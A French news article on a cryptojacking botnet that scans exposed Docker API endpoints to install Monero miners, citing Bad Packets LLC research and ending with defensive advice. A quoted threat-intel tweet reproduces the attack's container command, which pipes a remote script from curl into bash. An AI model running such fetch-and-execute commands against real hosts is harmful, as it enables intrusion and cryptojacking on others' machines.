Bad Packets LLC dévoile au grand jour l’existence d’un groupe de crypto-pirates
Poursuivant sa mission pour assainir le monde de la crypto-industrie, la société de cyber-sécurité Bad Packets LLC aurait identifié un groupe de pirates informatiques qui attaquent les points de terminaison vulnérable de l’API Docker. Leur but étant d’injecter des codes de crypto-monnaies et de miner ces dernières par la suite.
Une affaire qui requiert plus d’attention
Ces agissements sont ce qu’il y a de plus banal dans les formes de piratage, et pourtant cette affaire mérite une attention particulière à cause du volume d’arnaques perpétrées jusqu’ici.
En effet, les auteurs analyseraient en effet plus de 59 000 réseaux IP afin d’en identifier les instances vulnérables.
Troy Mursch, le directeur des recherches ainsi que co-fondateur de Bad Packets, a exprimé à ce propos :
« Ce qui a distingué cette campagne, c’est la forte augmentation d’activité […]. Cela seul méritait une enquête plus approfondie pour savoir ce que préparait ce botnet. »
Apparemment, les pirates auraient déjà réussi à miner la somme modique de 14,82 Monero (XMR), soit d’une valeur d’environ de 832 $.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o— Bad Packets Report (@bad_packets) November 25, 2019
Docker n’échappe pas aux pirates
Force est de constater que Docker ait été particulièrement visé par les crypto-pirates dernièrement.
Plus tôt au mois de mars, les hôtes Docker non mis à jour ont été ciblés à cause d’une vulnérabilité runC. L’accès a été ouvert par l’API distante de Docker publique, ce qui a rendu possible l’installation du logiciel de minage de Monero.
Et pas plus tard que le mois dernier, Gradoid, un ver crypto-jacking, a été détecté après avoir contaminé plus de 2 000 hôtes Docker non sécurisés.
Bad Packets LLC appelle donc les utilisateurs exécutant des instances Docker à vérifier s’ils exposent leurs points de terminaison d’API, à fermer les ports ainsi qu’à mettre fin aux conteneurs en cours d’exécution non reconnus, si tel est le cas.
Que pensez-vous de cette nouvelle découverte ? Faites-nous part de votre avis dans la section commentaire ci-dessous.